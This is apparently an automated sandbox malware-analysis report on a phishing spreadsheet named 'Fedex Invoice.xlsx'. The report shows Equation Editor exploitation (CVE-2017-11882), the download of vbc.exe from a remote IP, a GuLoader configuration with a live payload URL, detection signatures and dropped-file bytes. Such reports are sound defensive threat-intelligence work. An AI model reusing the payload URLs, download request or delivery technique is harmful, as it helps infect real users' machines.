Loading ...

Play interactive tourEdit tour

Windows Analysis Report Fedex Invoice.xlsx

Overview

General Information

Sample Name:Fedex Invoice.xlsx
Analysis ID:483375
MD5:ec7f52b07d135f71c63fd20054a89646
SHA1:c89fa952eaef37a4ad0a120fa2c998cd989bbf62
SHA256:150f45aec13d1ab1c92977d65ca5e88fd84aaba570446006265afdbcb85d03a6
Tags:FEDEXVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1256 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2624 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1712 cmdline: 'C:\Users\Public\vbc.exe' MD5: ED004FE1AA9F4FA169A05B6716C03484)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://37.0.11.217/KELLYREMCOS_UOuJB118.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    Exploits:

    barindex
    Sigma detected: EQNEDT32.EXE connecting to internetShow sources
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 212.192.246.25, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2624, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
    Sigma detected: File Dropped By EQNEDT32EXEShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2624, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

    System Summary:

    barindex
    Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2624, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1712
    Sigma detected: Execution from Suspicious FolderShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2624, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1712

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://37.0.11.217/KELLYREMCOS_UOuJB118.bin"}
    Multi AV Scanner detection for submitted fileShow sources
    Source: Fedex Invoice.xlsxVirustotal: Detection: 30%Perma Link
    Source: Fedex Invoice.xlsxReversingLabs: Detection: 27%
    Multi AV Scanner detection for domain / URLShow sources
    Source: http://212.192.246.25/rever/vbc.exeVirustotal: Detection: 7%Perma Link
    Multi AV Scanner detection for dropped fileShow sources
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeVirustotal: Detection: 23%Perma Link
    Machine Learning detection for dropped fileShow sources
    Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected

    Exploits:

    barindex
    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
    Source: excel.exeMemory has grown: Private usage: 4MB later: 70MB

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: http://37.0.11.217/KELLYREMCOS_UOuJB118.bin
    Source: Joe Sandbox ViewASN Name: RHC-HOSTINGGB RHC-HOSTINGGB
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Sep 2021 19:51:37 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29Last-Modified: Mon, 13 Sep 2021 23:18:39 GMTETag: "21000-5cbe8af7096b4"Accept-Ranges: bytesContent-Length: 135168Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 36 a4 c9 93 57 ca 9a 93 57 ca 9a 93 57 ca 9a 10 4b c4 9a 92 57 ca 9a dc 75 c3 9a 9a 57 ca 9a a5 71 c7 9a 92 57 ca 9a 52 69 63 68 93 57 ca 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 89 db 56 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 01 00 00 90 00 00 00 00 00 00 70 13 00 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 b5 a3 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 b9 01 00 28 00 00 00 00 10 02 00 22 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 ad 01 00 00 10 00 00 00 b0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 64 45 00 00 00 c0 01 00 00 10 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 22 3b 00 00 00 10 02 00 00 40 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: GET /rever/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.25Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: unknownTCP traffic detected without corresponding DNS query: 212.192.246.25
    Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: 5DD04ABC.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
    Source: vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DD04ABC.emfJump to behavior
    Source: global trafficHTTP traffic detected: GET /rever/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 212.192.246.25Connection: Keep-Alive

    System Summary:

    barindex
    Office equation editor drops PE fileShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456B606_2_00456B60
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B84C6_2_0045B84C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004554676_2_00455467
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A0626_2_0045A062
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004568726_2_00456872
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A07C6_2_0045A07C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456C146_2_00456C14
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004534176_2_00453417
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00454C346_2_00454C34
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00454C3C6_2_00454C3C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A43B6_2_0045A43B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A8CD6_2_0045A8CD
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004504E16_2_004504E1
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456CEF6_2_00456CEF
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004558F76_2_004558F7
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004544FC6_2_004544FC
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004534F96_2_004534F9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00459C856_2_00459C85
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045588C6_2_0045588C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004570AD6_2_004570AD
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004560A96_2_004560A9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004568A96_2_004568A9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A4B56_2_0045A4B5
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00459D576_2_00459D57
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004571526_2_00457152
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045115A6_2_0045115A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B5686_2_0045B568
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045517B6_2_0045517B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00455D076_2_00455D07
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00454D0B6_2_00454D0B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045710A6_2_0045710A
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004545156_2_00454515
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00453D1D6_2_00453D1D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004555196_2_00455519
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A5C76_2_0045A5C7
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A9C06_2_0045A9C0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00455DCB6_2_00455DCB
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004509E96_2_004509E9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00452DF56_2_00452DF5
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004535F16_2_004535F1
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004545FA6_2_004545FA
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045618F6_2_0045618F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004541A16_2_004541A1
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004551B16_2_004551B1
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B5BB6_2_0045B5BB
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B65C6_2_0045B65C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045265F6_2_0045265F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004572676_2_00457267
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00459A6C6_2_00459A6C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00454A776_2_00454A77
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004552736_2_00455273
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004556016_2_00455601
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045720D6_2_0045720D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B60D6_2_0045B60D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045BA0B6_2_0045BA0B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00455A1C6_2_00455A1C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045AE2B6_2_0045AE2B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00454E3D6_2_00454E3D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00453E3F6_2_00453E3F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A63F6_2_0045A63F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00459AC56_2_00459AC5
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004546CA6_2_004546CA
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00454EE06_2_00454EE0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004532FD6_2_004532FD
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00451EFA6_2_00451EFA
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00455EA66_2_00455EA6
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004586A36_2_004586A3
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B6AB6_2_0045B6AB
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004556B56_2_004556B5
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045AAB36_2_0045AAB3
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456B5E6_2_00456B5E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00451F6D6_2_00451F6D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456B736_2_00456B73
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045037E6_2_0045037E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045B7796_2_0045B779
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00451B036_2_00451B03
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A7096_2_0045A709
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00455B106_2_00455B10
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045731C6_2_0045731C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A3206_2_0045A320
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045AB236_2_0045AB23
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045533B6_2_0045533B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045A7DE6_2_0045A7DE
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00459FE76_2_00459FE7
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004557EF6_2_004557EF
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00455BF66_2_00455BF6
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004503F26_2_004503F2
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004503826_2_00450382
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045579F6_2_0045579F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00459B986_2_00459B98
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045339B6_2_0045339B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0045ABA06_2_0045ABA0
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00455FAB6_2_00455FAB
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456B60 NtAllocateVirtualMemory,6_2_00456B60
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456C14 NtAllocateVirtualMemory,6_2_00456C14
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456CEF NtAllocateVirtualMemory,6_2_00456CEF
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456B5E NtAllocateVirtualMemory,6_2_00456B5E
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00456B73 NtAllocateVirtualMemory,6_2_00456B73
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: vbc[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: Fedex Invoice.xlsxVirustotal: Detection: 30%
    Source: Fedex Invoice.xlsxReversingLabs: Detection: 27%
    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Fedex Invoice.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRFBCB.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@4/21@0/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00419524 push esi; retn 000Ch6_2_00419679
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00451120 push FFFFFFB9h; retf 6_2_00451125
    Source: initial sampleStatic PE information: section name: .text entropy: 7.10781804596
    Source: initial sampleStatic PE information: section name: .text entropy: 7.10781804596
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
